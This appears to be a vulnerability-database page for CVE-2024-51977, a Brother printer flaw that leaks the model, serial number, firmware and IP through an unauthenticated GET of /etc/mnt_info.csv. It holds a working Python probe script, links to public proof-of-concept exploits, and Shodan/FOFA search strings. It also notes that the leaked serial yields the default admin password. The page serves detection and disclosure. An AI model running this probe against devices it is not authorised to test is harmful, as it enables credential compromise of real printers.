CVE-2024-51977

MEDIUM EXPLOITED NUCLEI

Multiple Brother devices unauthenticated information disclosure via /etc/mnt_info.csv

Title source: metasploit (the module title belongs to the chained default administrator password bypass, CVE-2024-51978, which is derived from the serial number this CVE leaks)

Description

An unauthenticated attacker who can reach the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631) can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be fetched with a plain GET request; no authentication is required. The response is a comma separated value (CSV) table containing, among other fields, the device's model, firmware version, IP address, and serial number. Because the default administrator password of affected devices is derived from the serial number (CVE-2024-51978), this leak is the first stage of that authentication bypass chain, which is why the Metasploit module for CVE-2024-51978 is listed under Exploits below.
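The check below is an added example written for this page; it is not the Metasploit module, the Nuclei template, or any of the linked PoCs. It issues the unauthenticated GET described above, treats the response as a header-row/value-row CSV table, and reports only when that table actually parses and carries the sensitive columns, so a 200 from a captive portal or an error page is not mistaken for a leak. The column names and values in SAMPLE_BODY are constructed for offline testing and are assumptions about the table layout, not a capture from a real device.

```python
"""Offline-testable check for CVE-2024-51977: the unauthenticated
/etc/mnt_info.csv endpoint on affected Brother devices."""
import csv
import io
import ssl
import urllib.error
import urllib.request
from typing import Dict, Tuple

MNT_INFO_PATH = "/etc/mnt_info.csv"

# Column-name substrings that mark the fields the advisory calls sensitive
# (model, serial number, firmware version, IP address).
SENSITIVE_HINTS = ("model", "serial", "firm", "ip")

# Constructed sample response (not a real device capture). The column names
# and values are assumptions used only to exercise the parser offline.
SAMPLE_BODY = (
    "Model,Serial No.,Firmware Version,IP Address\r\n"
    "Brother MFC-L9570CDW,A0000000000001,ZA1.00,192.0.2.10\r\n"
)


def parse_mnt_info(body: str) -> Dict[str, str]:
    """Parse the two-row CSV (header row, value row) into a dict.

    Blank lines are ignored; a body with fewer than two rows is rejected so a
    404 page or an empty reply is never mistaken for device data.
    """
    reader = csv.reader(io.StringIO(body, newline=""))
    rows = [r for r in reader if any(c.strip() for c in r)]
    if len(rows) < 2:
        raise ValueError("expected a header row and at least one value row")
    header, values = rows[0], rows[1]
    return {h.strip(): v.strip() for h, v in zip(header, values)}


def leaked_fields(info: Dict[str, str]) -> Dict[str, str]:
    """Keep only the non-empty columns whose names hint at sensitive data."""
    return {
        k: v for k, v in info.items()
        if v and any(hint in k.lower() for hint in SENSITIVE_HINTS)
    }


def is_vulnerable(status: int, body: str) -> bool:
    """Affected when the unauthenticated GET returns 200 and the body parses
    as the inventory table with at least one sensitive field present."""
    if status != 200:
        return False
    try:
        info = parse_mnt_info(body)
    except ValueError:
        return False
    return bool(leaked_fields(info))


def fetch_mnt_info(host: str, port: int = 80, https: bool = False,
                   timeout: float = 5.0) -> Tuple[int, str]:
    """GET /etc/mnt_info.csv with no credentials and return (status, body).

    Printers almost always present self-signed certificates, so certificate
    verification is disabled for the HTTPS service (port 443) only. Port 631
    (IPP) also speaks HTTP and can be probed with https=False, port=631.
    """
    scheme = "https" if https else "http"
    url = f"{scheme}://{host}:{port}{MNT_INFO_PATH}"
    ctx = None
    if https:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers={"User-Agent": "mnt-info-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        # 401/403/404 etc. are "not vulnerable" for this check; keep the code.
        return exc.code, ""


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        status, body = fetch_mnt_info(sys.argv[1])
    else:
        status, body = 200, SAMPLE_BODY  # dry run against the constructed sample
    if is_vulnerable(status, body):
        print("vulnerable: unauthenticated /etc/mnt_info.csv leaks device data")
        for k, v in leaked_fields(parse_mnt_info(body)).items():
            print(f"  {k}: {v}")
    else:
        print(f"not vulnerable (HTTP {status})")
```

Run it with a host argument to probe a device over plain HTTP on port 80, or with no argument to see the parser exercised on the constructed sample. Only the serial number column matters for the follow-on CVE-2024-51978 chain; the other fields are still worth recording because they identify the firmware level to check against Brother's fixed versions.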

Exploits (3)

github WORKING POC 40 stars
by iSee857 · pythonpoc
https://github.com/iSee857/CVE-PoC/tree/main/BrotherPrinters-CVE-2024-51977-InformationDisclosure.py
nomisec WORKING POC 29 stars
by sfewer-r7 · infoleak
https://github.com/sfewer-r7/BrotherVulnerabilities
metasploit WORKING POC
by sfewer-r7 · rubypoc
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978.rb

Nuclei Templates (1)

Brother MFC-L9570CDW - Information Disclosure
MEDIUM VERIFIED by DhiyaneshDK, iamnoooob, darses
Shodan: html:"MFC-L9570CDW"
FOFA: app="brother-Printer"

Scores

CVSS v3 5.3
EPSS 0.3951 (39.5%)
EPSS Percentile 97.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Exploitation Intel

VulnCheck KEV 2025-07-09

Classification

CWE
CWE-538 (Insertion of Sensitive Information into Externally-Accessible File or Directory)
Status draft

Timeline

Published Jun 25, 2025
Tracked Since Feb 18, 2026